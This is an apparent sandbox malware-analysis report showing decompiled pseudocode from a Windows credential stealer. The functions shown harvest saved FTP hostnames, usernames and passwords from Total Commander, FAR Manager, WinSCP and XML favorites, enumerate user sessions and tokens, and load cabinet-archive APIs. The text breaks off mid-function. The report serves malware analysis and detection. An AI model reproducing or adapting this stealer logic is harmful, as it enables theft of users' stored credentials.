                Uniqueness Score: -1.00%

                Control-flow Graph for E004059F8 (rendered graph not reproduced here; legend: Executed / Not Executed)
                C-Code - Quality: 71%
                			E004059F8(char* __ecx, char** __edx, void* __eflags) {
                				signed int _v8;
                				intOrPtr _v12;
                				char _v16;
                				char* _v20;
                				char* _v24;
                				char* _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				short _v558;
                				char _v564;
                				short _v1084;
                				void* __edi;
                				void* __esi;
                				int _t41;
                				WCHAR* _t69;
                				intOrPtr _t70;
                				WCHAR* _t71;
                				void* _t72;
                				intOrPtr _t86;
                
                				_t67 = __edx;
                				_t65 = __ecx;
                				E004098AA( &_v16,  &_v16, 0, 8);
                				_t69 =  &_v564;
                				_t41 = E0040ED7B(0x104, _t69, 0x80000001, L"SOFTWARE\\Ghisler\\Total Commander", L"ftpininame");
                				if(_t41 != 0xffffffff && _t41 > 0) {
                					ExpandEnvironmentStringsW(_t69,  &_v1084, 0x104);
                					_push( &_v16);
                					E00405841(_t67,  &_v1084);
                					_t41 = PathRemoveFileSpecW( &_v1084);
                				}
                				if(_v12 != 0) {
                					L15:
                					if(_t86 > 0) {
                						E00412508(_t41, _v16, _t67, _t86, L"Total Commander");
                					}
                					return E004097F7(_v16);
                				} else {
                					_v8 = _v8 & 0x00000000;
                					_v44 = 0x24;
                					_v40 = 0x1a;
                					_v36 = 0x26;
                					_v32 = 0x23;
                					_v28 = L"*totalcmd*";
                					_v24 = L"*total*commander*";
                					_v20 = L"*ghisler*";
                					do {
                						_t70 =  *((intOrPtr*)(_t72 + _v8 * 4 - 0x28));
                						_t41 = 0;
                						__imp__SHGetFolderPathW(0, _t70, 0, 0,  &_v564);
                						if(0 == 0) {
                							if(_t70 == 0x24) {
                								E0040580C(_t65,  &_v564,  &_v16, 0);
                								_v558 = 0;
                							}
                							_t67 =  &_v28;
                							_t65 =  &_v564;
                							_t41 = E0040B4D8( &_v564,  &_v28, 0, 3, 2, E004059AF,  &_v16, 0, 0, 0);
                						}
                						_v8 = _v8 + 1;
                					} while (_v8 < 4);
                					if(_v12 == 0) {
                						_t71 =  &_v564;
                						_t41 = E0040ED7B(0x104, _t71, 0x80000001, L"SOFTWARE\\Ghisler\\Total Commander", L"installdir");
                						if(_t41 != 0xffffffff && _t41 > 0) {
                							ExpandEnvironmentStringsW(_t71,  &_v1084, 0x104);
                							_t41 = E0040580C(_t65,  &_v1084,  &_v16, 1);
                						}
                						_t86 = _v12;
                					}
                					goto L15;
                				}
                			}

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\Ghisler\Total Commander,ftpininame,?,00000000,00000008), ref: 00405A45
                  • Part of subcall function 00405841: HeapAlloc.KERNEL32(00000008,00020002,?,?,?,?,?), ref: 0040585B
                  • Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405880
                  • Part of subcall function 00405841: HeapAlloc.KERNEL32(00000008,00000C0C,?,?,?,?,?), ref: 004058A9
                  • Part of subcall function 00405841: StrStrIW.SHLWAPI(00000000,connections,?,?,?,?,?), ref: 004058D1
                  • Part of subcall function 00405841: StrStrIW.SHLWAPI(00000000,default,?,?,?,?,?), ref: 004058E1
                  • Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 004058FC
                  • Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405916
                  • Part of subcall function 00405841: GetPrivateProfileStringW.KERNEL32 ref: 00405930
                • PathRemoveFileSpecW.SHLWAPI(?,?,?), ref: 00405A62
                • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,80000001,SOFTWARE\Ghisler\Total Commander,ftpininame,?,00000000,00000008), ref: 00405ABB
                • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,80000001,SOFTWARE\Ghisler\Total Commander,installdir), ref: 00405B3D
                Similarity
                • API ID: PrivateProfileString$AllocEnvironmentExpandHeapPathStrings$FileFolderRemoveSpec
                • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$Total Commander$ftpininame$installdir
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph for E0040618E (rendered graph not reproduced here; legend: Executed / Not Executed)
                C-Code - Quality: 93%
                			E0040618E() {
                				void* _v8;
                				int _v12;
                				void* _v16;
                				signed int _v20;
                				int _v24;
                				intOrPtr _v28;
                				char _v32;
                				char* _v36;
                				char* _v40;
                				short _v564;
                				void* __edi;
                				void* __esi;
                				void* _t51;
                				void* _t57;
                				int _t65;
                				int _t71;
                				int _t73;
                				int _t77;
                				void* _t79;
                				void* _t81;
                				void* _t88;
                				int _t90;
                				void* _t95;
                				void* _t96;
                
                				_t51 = HeapAlloc( *0x41a570, 8, 0xc0c);
                				_t90 = 0;
                				_v16 = _t51;
                				if(_t51 == 0) {
                					return _t51;
                				} else {
                					_v40 = L"SOFTWARE\\Far\\Plugins\\ftp\\hosts";
                					_v36 = L"SOFTWARE\\Far2\\Plugins\\ftp\\hosts";
                					E004098AA( &_v32,  &_v32, 0, 8);
                					_v20 = 0;
                					do {
                						if(RegOpenKeyExW(0x80000001,  *(_t95 + _v20 * 4 - 0x24), _t90, 8,  &_v8) != 0) {
                							goto L19;
                						}
                						_v24 = _t90;
                						_v12 = 0x104;
                						if(RegEnumKeyExW(_v8, _t90,  &_v564,  &_v12, _t90, _t90, _t90, _t90) != 0) {
                							L18:
                							RegCloseKey(_v8);
                							goto L19;
                						} else {
                							goto L4;
                						}
                						do {
                							L4:
                							_t91 = _v16;
                							_v24 = _v24 + 1;
                							_t65 = E0040ED7B(0xff, _v16, _v8,  &_v564, L"hostname");
                							_v12 = _t65;
                							if(_t65 != 0xffffffff && _t65 > 0) {
                								_t71 = E0040ED7B(0xff, _t91 + 0x1fe, _v8,  &_v564, L"username");
                								_v12 = _t71;
                								if(_t71 == 0xffffffff || _t71 <= 0) {
                									_t73 = E0040ED7B(0xff, _v16 + 0x1fe, _v8,  &_v564, L"user");
                									_v12 = _t73;
                									if(_t73 == 0xffffffff || _t73 <= 0) {
                										goto L16;
                									} else {
                										goto L10;
                									}
                								} else {
                									L10:
                									_t88 = _v16 + 0x3fc;
                									_t77 = E0040EE27(_v8,  &_v564, L"password", 0, _t88, 0xff);
                									_v12 = _t77;
                									if(_t77 != 0xffffffff && _t77 > 0 && E00406133(_t88) > 0) {
                										_t79 = _v16;
                										_push(_t79);
                										_push(_t88);
                										_push(_t79 + 0x1fe);
                										_t89 = _t88 + 0x1fe;
                										_t81 = E0040A4B7(_t79 + 0x1fe, 0x307, _t88 + 0x1fe, L"ftp://%s:%s@%s\n");
                										_t96 = _t96 + 0x10;
                										if(_t81 > 0 && E00409B2A(_t81,  &_v32, _t89) != 0) {
                											_v28 = _v28 + 1;
                										}
                									}
                									goto L16;
                								}
                							}
                							L16:
                							_v12 = 0x104;
                						} while (RegEnumKeyExW(_v8, _v24,  &_v564,  &_v12, 0, 0, 0, 0) == 0);
                						_t90 = 0;
                						goto L18;
                						L19:
                						_v20 = _v20 + 1;
                					} while (_v20 < 2);
                					_t57 = E004097F7(_v16);
                					_t115 = _v28 - _t90;
                					if(_v28 > _t90) {
                						E00412508(_t57, _v32, 0x307, _t115, L"FAR manager");
                					}
                					return E004097F7(_v32);
                				}
                			}

                APIs
                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004061A7
                • RegOpenKeyExW.ADVAPI32(80000001,00401AB4,00000000,00000008,?,?,00000000,00000008), ref: 004061EF
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040621A
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,hostname), ref: 00406337
                • RegCloseKey.ADVAPI32(?), ref: 0040634A
                Similarity
                • API ID: Enum$AllocCloseHeapOpen
                • String ID: FAR manager$SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph for E0040851A (rendered graph not reproduced here; legend: Executed / Not Executed)
                C-Code - Quality: 51%
                			E0040851A(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                				char _v8;
                				char _v12;
                				_Unknown_base(*)()* _v16;
                				intOrPtr _v20;
                				struct HINSTANCE__* _v24;
                				void* __esi;
                				struct HINSTANCE__* _t20;
                				_Unknown_base(*)()* _t23;
                				intOrPtr _t25;
                				intOrPtr _t31;
                				struct HINSTANCE__* _t35;
                				_Unknown_base(*)()* _t36;
                				void* _t37;
                				intOrPtr* _t38;
                				intOrPtr* _t40;
                				void* _t42;
                				void* _t45;
                
                				_t37 = __ecx;
                				_t20 = LoadLibraryA("wtsapi32.dll");
                				_t35 = _t20;
                				_v24 = _t35;
                				if(_t35 == 0) {
                					return _t20;
                				}
                				_t40 = GetProcAddress(_t35, "WTSEnumerateSessionsW");
                				_v16 = GetProcAddress(_t35, "WTSFreeMemory");
                				_t23 = GetProcAddress(_t35, "WTSQueryUserToken");
                				_t45 = 0;
                				_t36 = _t23;
                				if(_t40 == 0 || _v16 == 0 || _t36 == 0) {
                					L14:
                					return FreeLibrary(_v24);
                				} else {
                					_t25 = E0040F3C3(L"SeTcbPrivilege");
                					__imp__WTSGetActiveConsoleSessionId();
                					_v20 = _t25;
                					if(_t25 != 0xffffffff) {
                						E004084A9(_t37, 0, _t36, _t25, _a4, _a8);
                					}
                					_push( &_v8);
                					_push( &_v12);
                					_push(1);
                					_push(_t45);
                					_push(_t45);
                					if( *_t40() == 0) {
                						goto L14;
                					} else {
                						_t42 = 0;
                						if(_v8 <= _t45) {
                							L13:
                							_v16(_v12);
                							goto L14;
                						} else {
                							goto L8;
                						}
                						do {
                							L8:
                							_t38 = _t45 + _v12;
                							_t31 =  *((intOrPtr*)(_t38 + 8));
                							if(_t31 == 0 || _t31 == 4) {
                								_t32 =  *_t38;
                								if( *_t38 != _v20) {
                									E004084A9(_t38, _t45, _t36, _t32, _a4, _a8);
                								}
                							}
                							_t42 = _t42 + 1;
                							_t45 = _t45 + 0xc;
                						} while (_t42 < _v8);
                						goto L13;
                					}
                				}
                			}

                APIs
                • LoadLibraryA.KERNEL32(wtsapi32.dll,00000000,000000FF,00408169,?,?,74B05B60), ref: 00408526
                • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 00408547
                • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 00408551
                • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 0040855C
                • FreeLibrary.KERNEL32(?), ref: 004085E5
                  • Part of subcall function 0040F3C3: GetCurrentThread.KERNEL32 ref: 0040F3D3
                  • Part of subcall function 0040F3C3: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3DA
                  • Part of subcall function 0040F3C3: OpenProcessToken.ADVAPI32(000000FF,00000020,?,?,?,?,?,?,?,?,?,?,00408579,SeTcbPrivilege), ref: 0040F3EC
                • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege), ref: 00408579
                  • Part of subcall function 004084A9: EqualSid.ADVAPI32(00000000,004085F2,?,004085F2), ref: 004084CE
                  • Part of subcall function 004084A9: CloseHandle.KERNEL32(?,?,004085F2), ref: 0040850F
                Similarity
                • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
                • String ID: .exe$C:\Users\Jamey\AppData\Roaming$SeTcbPrivilege$WTSEnumerateSessionsW$WTSFreeMemory$WTSQueryUserToken$wtsapi32.dll
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00406FCD(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
                				char _v524;
                				signed int _v548;
                				char _v556;
                				char* _v560;
                				char _v564;
                				char _v568;
                				intOrPtr* _v572;
                				char _v576;
                				intOrPtr* _v580;
                				signed int _v584;
                				char _v588;
                				signed int _v592;
                				char _v596;
                				intOrPtr* _v604;
                				signed int _v608;
                				signed int _v612;
                				signed int _v616;
                				signed int _v620;
                				void* __edi;
                				void* __esi;
                				signed int _t64;
                				intOrPtr* _t67;
                				signed int _t68;
                				intOrPtr* _t69;
                				signed int _t72;
                				intOrPtr* _t74;
                				signed int _t75;
                				intOrPtr* _t76;
                				signed int _t77;
                				intOrPtr* _t78;
                				signed int _t79;
                				intOrPtr* _t80;
                				signed int _t81;
                				signed int _t82;
                				signed int _t87;
                				signed int _t89;
                				signed int _t91;
                				signed int _t93;
                				signed int _t102;
                				signed int _t103;
                				void* _t125;
                				signed int _t126;
                				intOrPtr* _t130;
                				intOrPtr _t131;
                
                				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
                					L48:
                					return 1;
                				}
                				_t142 =  *__edx & 0x00000010;
                				if(( *__edx & 0x00000010) == 0) {
                					_t102 = E00410075( &_v524, __eflags,  &_v524);
                					_v548 = _t102;
                					__eflags = _t102;
                					if(_t102 == 0) {
                						goto L48;
                					}
                					_t64 =  *((intOrPtr*)( *_t102 + 0xb4))(_t102,  &_v564);
                					__eflags = _t64;
                					if(_t64 != 0) {
                						L47:
                						 *((intOrPtr*)( *_t102 + 8))(_t102);
                						goto L48;
                					}
                					_t67 = _v572;
                					_t68 =  *((intOrPtr*)( *_t67 + 0x1c))(_t67,  &_v568);
                					__eflags = _t68;
                					if(_t68 != 0) {
                						L46:
                						_t69 = _v580;
                						 *((intOrPtr*)( *_t69 + 8))(_t69);
                						goto L47;
                					}
                					_t125 = 0xc;
                					_t72 = E0040A457(L"FavoriteItem", _v576, _t125);
                					__eflags = _t72;
                					if(_t72 != 0) {
                						_t130 = __imp__#6;
                						L45:
                						 *_t130(_v576);
                						goto L46;
                					}
                					_t74 = _v580;
                					_t110 =  *_t74;
                					_t75 =  *((intOrPtr*)( *_t74 + 0x94))(_t74, L"Host",  &_v556);
                					__eflags = _t75;
                					if(_t75 != 0) {
                						_t22 =  &_v584;
                						 *_t22 = _v584 & 0x00000000;
                						__eflags =  *_t22;
                					} else {
                						_v584 = E004100F7(_t110,  &_v568);
                					}
                					_t76 = _v592;
                					_t111 =  *_t76;
                					_t77 =  *((intOrPtr*)( *_t76 + 0x94))(_t76, L"Port",  &_v556);
                					__eflags = _t77;
                					if(_t77 != 0) {
                						_t29 =  &_v592;
                						 *_t29 = _v592 & 0x00000000;
                						__eflags =  *_t29;
                					} else {
                						_v592 = E004100F7(_t111,  &_v568);
                					}
                					_t78 = _v604;
                					_t112 =  *_t78;
                					_t79 =  *((intOrPtr*)( *_t78 + 0x94))(_t78, L"User",  &_v576);
                					__eflags = _t79;
                					if(_t79 != 0) {
                						_t103 = 0;
                						__eflags = 0;
                					} else {
                						_t103 = E004100F7(_t112,  &_v588);
                					}
                					_t80 = _v616;
                					_t113 =  *_t80;
                					_t121 =  &_v584;
                					_t81 =  *((intOrPtr*)( *_t80 + 0x94))(_t80, L"Password",  &_v584);
                					__eflags = _t81;
                					if(_t81 != 0) {
                						_t126 = 0;
                						__eflags = 0;
                					} else {
                						_t126 = E004100F7(_t113,  &_v596);
                					}
                					_t82 = _v620;
                					__eflags = _t82;
                					if(_t82 == 0) {
                						_t130 = __imp__#6;
                						goto L37;
                					} else {
                						__eflags =  *_t82;
                						if( *_t82 == 0) {
                							L35:
                							_t130 = __imp__#6;
                							 *_t130(_v620);
                							L37:
                							__eflags = _v616;
                							if(_v616 != 0) {
                								 *_t130(_v616);
                							}
                							__eflags = _t103;
                							if(_t103 != 0) {
                								 *_t130(_t103);
                							}
                							__eflags = _t126;
                							if(_t126 != 0) {
                								 *_t130(_t126);
                							}
                							_t102 = _v608;
                							goto L45;
                						}
                						__eflags = _t103;
                						if(_t103 == 0) {
                							goto L35;
                						}
                						__eflags =  *_t103;
                						if( *_t103 == 0) {
                							goto L35;
                						}
                						__eflags = _t126;
                						if(_t126 == 0) {
                							goto L35;
                						}
                						_t87 = E00406AE4(_t121, _t126);
                						__eflags = _t87;
                						if(_t87 <= 0) {
                							goto L35;
                						}
                						_t88 = _v616;
                						__eflags = _v616;
                						if(_v616 == 0) {
                							_t89 = 0;
                							__eflags = 0;
                						} else {
                							_t89 = E00409E66(_t88);
                						}
                						__eflags = _t89 - 1;
                						if(_t89 < 1) {
                							L30:
                							_t89 = 0x15;
                							goto L31;
                						} else {
                							__eflags = _t89 - 0xffff;
                							if(_t89 <= 0xffff) {
                								L31:
                								_v612 = _v612 & 0x00000000;
                								_push(_t89);
                								_push(_v620);
                								_push(_t126);
                								_t91 = E0040A532( &_v612, L"ftp://%s:%s@%s:%u\n", _t103);
                								__eflags = _t91;
                								if(_t91 > 0) {
                									_t131 = _a4;
                									_t93 = E00409B2A(_t91, _t131, _v612);
                									__eflags = _t93;
                									if(_t93 != 0) {
                										_t47 = _t131 + 4;
                										 *_t47 =  *(_t131 + 4) + 1;
                										__eflags =  *_t47;
                									}
                								}
                								E004097F7(_v612);
                								goto L35;
                							}
                							goto L30;
                						}
                					}
                				}
                				_v560 = L"*.xml";
                				E0040B4D8( &_v524,  &_v560, _t142, 1, 5, E00406FCD, _a4, 0, 0, 0);
                				goto L48;
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
                • String ID: *.xml$FavoriteItem$Host$Password$Port$User$ftp://%s:%s@%s:%u
                • API String ID: 1075381090-4126475539
                • Opcode ID: 800e3c33a2f1f7326797e8889f0a0853e19ce156c94fae929727c172f6cbfdcd
                • Instruction ID: f729dd802e85921fa6b0a08b29b2cf87ef067dd3d22d64b7412b4332596ce7c4
                • Opcode Fuzzy Hash: 800e3c33a2f1f7326797e8889f0a0853e19ce156c94fae929727c172f6cbfdcd
                • Instruction Fuzzy Hash: B4618D31A083029BD710DF65C844A6B77A8AF84748F04497EF845AB2E1D778E945CBAB
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E0040643F(void* __edx) {
                				void* _v8;
                				char* _v12;
                				int _v16;
                				signed int _v20;
                				int _v24;
                				intOrPtr _v28;
                				char _v32;
                				char _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				short _v572;
                				void* __edi;
                				void* __esi;
                				long _t61;
                				intOrPtr _t63;
                				int _t69;
                				intOrPtr _t71;
                				void* _t73;
                				intOrPtr _t74;
                				intOrPtr _t76;
                				intOrPtr _t77;
                				int* _t79;
                				intOrPtr _t80;
                				void* _t90;
                				char* _t92;
                				void* _t93;
                				void* _t94;
                
                				_t86 = __edx;
                				_t79 = 0;
                				E004098AA( &_v36,  &_v36, 0, 8);
                				_t90 = HeapAlloc( *0x41a570, 8, 0xc20);
                				_v28 = _t90;
                				if(_t90 == 0) {
                					L23:
                					_t99 = _v32 - _t79;
                					if(_v32 > _t79) {
                						E00412508(_t52, _v36, _t86, _t99, L"WinSCP");
                					}
                					return E004097F7(_v36);
                				} else {
                					_t3 = _t90 + 0x3fc; // 0x3fc
                					_v48 = 0x80000001;
                					_v44 = 0x80000002;
                					_v12 = _t3;
                					_v20 = 0;
                					do {
                						if(RegOpenKeyExW( *(_t93 + _v20 * 4 - 0x2c), L"SOFTWARE\\martin prikryl\\winscp 2\\sessions", _t79, 8,  &_v8) != 0) {
                							goto L21;
                						}
                						_v24 = _t79;
                						_v16 = 0x104;
                						_t61 = RegEnumKeyExW(_v8, _t79,  &_v572,  &_v16, _t79, _t79, _t79, _t79);
                						while(_t61 == 0) {
                							_v24 = _v24 + 1;
                							_t63 = E0040ED7B(0xff, _t90, _v8,  &_v572, L"hostname");
                							_v40 = _t63;
                							__eflags = _t63 - 0xffffffff;
                							if(_t63 == 0xffffffff) {
                								L18:
                								_v16 = 0x104;
                								_t61 = RegEnumKeyExW(_v8, _v24,  &_v572,  &_v16, _t79, _t79, _t79, _t79);
                								_t90 = _v28;
                								continue;
                							}
                							__eflags = _t63 - _t79;
                							if(_t63 <= _t79) {
                								goto L18;
                							}
                							_t80 = E0040ED7B(0xff, _t90 + 0x1fe, _v8,  &_v572, L"username");
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								L17:
                								_t79 = 0;
                								__eflags = 0;
                								goto L18;
                							}
                							__eflags = _t80;
                							if(_t80 <= 0) {
                								goto L17;
                							}
                							_t92 = _v12;
                							_t69 = E0040ED7B(0xff, _t92, _v8,  &_v572, L"password");
                							_v16 = _t69;
                							__eflags = _t69 - 0xffffffff;
                							if(_t69 == 0xffffffff) {
                								goto L17;
                							}
                							__eflags = _t69;
                							if(_t69 <= 0) {
                								goto L17;
                							}
                							_t71 = E00406384(_t86, _t92, _t80 + _v40);
                							__eflags = _t71;
                							if(_t71 <= 0) {
                								goto L17;
                							}
                							_t73 = E0040EDD3(_t82, _v8,  &_v572, L"portnumber");
                							__eflags = _t73 - 1;
                							if(_t73 < 1) {
                								L13:
                								_t73 = 0x15;
                								L14:
                								_push(_t73);
                								_t74 = _v28;
                								_push(_t74);
                								_t82 = _t92;
                								_push(_t92);
                								_push(_t74 + 0x1fe);
                								_t86 = 0x311;
                								_t76 = E0040A4B7(_t74 + 0x1fe, 0x311, _t92 + 0x1fe, L"ftp://%s:%s@%s:%u\n");
                								_t94 = _t94 + 0x14;
                								__eflags = _t76;
                								if(_t76 > 0) {
                									_t82 =  &_v36;
                									_t77 = E00409B2A(_t76,  &_v36, _t92 + 0x1fe);
                									__eflags = _t77;
                									if(_t77 != 0) {
                										_t35 =  &_v32;
                										 *_t35 = _v32 + 1;
                										__eflags =  *_t35;
                									}
                								}
                								goto L17;
                							}
                							__eflags = _t73 - 0xffff;
                							if(_t73 <= 0xffff) {
                								goto L14;
                							}
                							goto L13;
                						}
                						RegCloseKey(_v8);
                						L21:
                						_v20 = _v20 + 1;
                					} while (_v20 < 2);
                					_t52 = E004097F7(_t90);
                					goto L23;
                				}
                			}

                APIs
                • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00406466
                • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\martin prikryl\winscp 2\sessions,00000000,00000008,?), ref: 004064A6
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004064D1
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,hostname), ref: 004065F0
                • RegCloseKey.ADVAPI32(?), ref: 00406604
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocCloseHeapOpen
                • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$WinSCP$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                • API String ID: 2215211458-3245696038
                • Opcode ID: 8bdba5e065b30dbc9030e85f0af6db04464695886fa7e2566bfce0e6d8dc20b5
                • Instruction ID: 30a5285e5c4baa300f1dc1d0c84335af07466dc0796cf7ab67906384150b5606
                • Opcode Fuzzy Hash: 8bdba5e065b30dbc9030e85f0af6db04464695886fa7e2566bfce0e6d8dc20b5
                • Instruction Fuzzy Hash: 39516D71900219BFEB10AFA5DD85AEFB6BCEF04304F10457AF512B22E1D7785E658B28
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E223() {
                				struct HINSTANCE__* _t2;
                				_Unknown_base(*)()* _t7;
                				void* _t9;
                				intOrPtr _t14;
                				intOrPtr _t16;
                				intOrPtr _t17;
                				intOrPtr _t18;
                
                				_t14 =  *0x41a580; // 0x0
                				if(_t14 != 0) {
                					L9:
                					 *0x41a580 =  *0x41a580 + 1;
                					return 1;
                				} else {
                					_t2 = LoadLibraryA("cabinet.dll");
                					 *0x41a57c = _t2;
                					if(_t2 == 0) {
                						L8:
                						return 0;
                					} else {
                						 *0x419ba4 = GetProcAddress(_t2, "FCICreate");
                						 *0x41a56c = GetProcAddress( *0x41a57c, "FCIAddFile");
                						 *0x4192cc = GetProcAddress( *0x41a57c, "FCIFlushCabinet");
                						_t7 = GetProcAddress( *0x41a57c, "FCIDestroy");
                						 *0x41a574 = _t7;
                						_t16 =  *0x419ba4; // 0x0
                						if(_t16 == 0) {
                							L7:
                							FreeLibrary( *0x41a57c);
                							goto L8;
                						} else {
                							_t17 =  *0x41a56c; // 0x0
                							if(_t17 == 0) {
                								goto L7;
                							} else {
                								_t18 =  *0x4192cc; // 0x0
                								if(_t18 == 0 || _t7 == 0) {
                									goto L7;
                								} else {
                									_t9 = HeapCreate(0, 0x80000, 0);
                									 *0x4191c4 = _t9;
                									if(_t9 != 0) {
                										goto L9;
                									} else {
                										goto L7;
                									}
                								}
                							}
                						}
                					}
                				}
                			}

                APIs
                • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040E30A,?,0040E52E,?,?,00000000,?,?), ref: 0040E237
                • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040E257
                • GetProcAddress.KERNEL32(FCIAddFile), ref: 0040E269
                • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040E27B
                • GetProcAddress.KERNEL32(FCIDestroy), ref: 0040E28D
                • HeapCreate.KERNEL32(00000000,00080000,00000000,0040E52E,?,?,00000000,?,?), ref: 0040E2B8
                • FreeLibrary.KERNEL32(0040E52E,?,?,00000000,?,?), ref: 0040E2CD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$Library$CreateFreeHeapLoad
                • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
                • API String ID: 2040708800-1163896595
                • Opcode ID: c826c1696955950314d21eed4bc06ee3e2b7d1adfcf57577c81d661b81444df7
                • Instruction ID: 42e6ffbcc0e077c243f06d100030672c496687fc0664d38dd4572b2fcae4638f
                • Opcode Fuzzy Hash: c826c1696955950314d21eed4bc06ee3e2b7d1adfcf57577c81d661b81444df7
                • Instruction Fuzzy Hash: CF111E34D4A610BECB119F76FD089A63BA6B749B503648D7BE500B22F0D77A4461DF0E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00405E5C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
                				char _v524;
                				intOrPtr* _v536;
                				char* _v560;
                				char _v564;
                				char _v568;
                				char _v572;
                				char _v576;
                				char _v580;
                				char _v584;
                				char _v596;
                				intOrPtr* _v600;
                				char _v608;
                				intOrPtr _v612;
                				char _v616;
                				intOrPtr* _v620;
                				intOrPtr _v624;
                				intOrPtr* _v632;
                				char _v636;
                				void* __esi;
                				intOrPtr* _t65;
                				intOrPtr* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t73;
                				intOrPtr* _t74;
                				intOrPtr* _t75;
                				intOrPtr* _t76;
                				intOrPtr* _t77;
                				intOrPtr* _t78;
                				intOrPtr* _t79;
                				intOrPtr* _t80;
                				intOrPtr* _t81;
                				intOrPtr* _t83;
                				intOrPtr* _t84;
                				intOrPtr _t86;
                				intOrPtr _t88;
                				intOrPtr _t90;
                				intOrPtr _t91;
                				intOrPtr* _t124;
                				intOrPtr* _t128;
                				intOrPtr* _t129;
                				signed int _t134;
                				void* _t136;
                
                				_t136 = (_t134 & 0xfffffff8) - 0x234;
                				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
                					L45:
                					return 1;
                				}
                				_t139 =  *__edx & 0x00000010;
                				if(( *__edx & 0x00000010) == 0) {
                					_t128 = E00410075( &_v524, __eflags,  &_v524);
                					_v536 = _t128;
                					__eflags = _t128;
                					if(_t128 == 0) {
                						goto L45;
                					}
                					_t65 =  *((intOrPtr*)( *_t128 + 0x90))(_t128, L"/*/*/Server",  &_v560);
                					__eflags = _t65;
                					if(_t65 != 0) {
                						L44:
                						 *((intOrPtr*)( *_t128 + 8))(_t128);
                						goto L45;
                					}
                					_t68 = _v572;
                					_t69 =  *((intOrPtr*)( *_t68 + 0x24))(_t68,  &_v576);
                					__eflags = _t69;
                					if(_t69 != 0) {
                						L43:
                						_t70 = _v580;
                						 *((intOrPtr*)( *_t70 + 8))(_t70);
                						goto L44;
                					} else {
                						goto L6;
                					}
                					do {
                						L6:
                						_t72 = _v584;
                						_t106 =  *_t72;
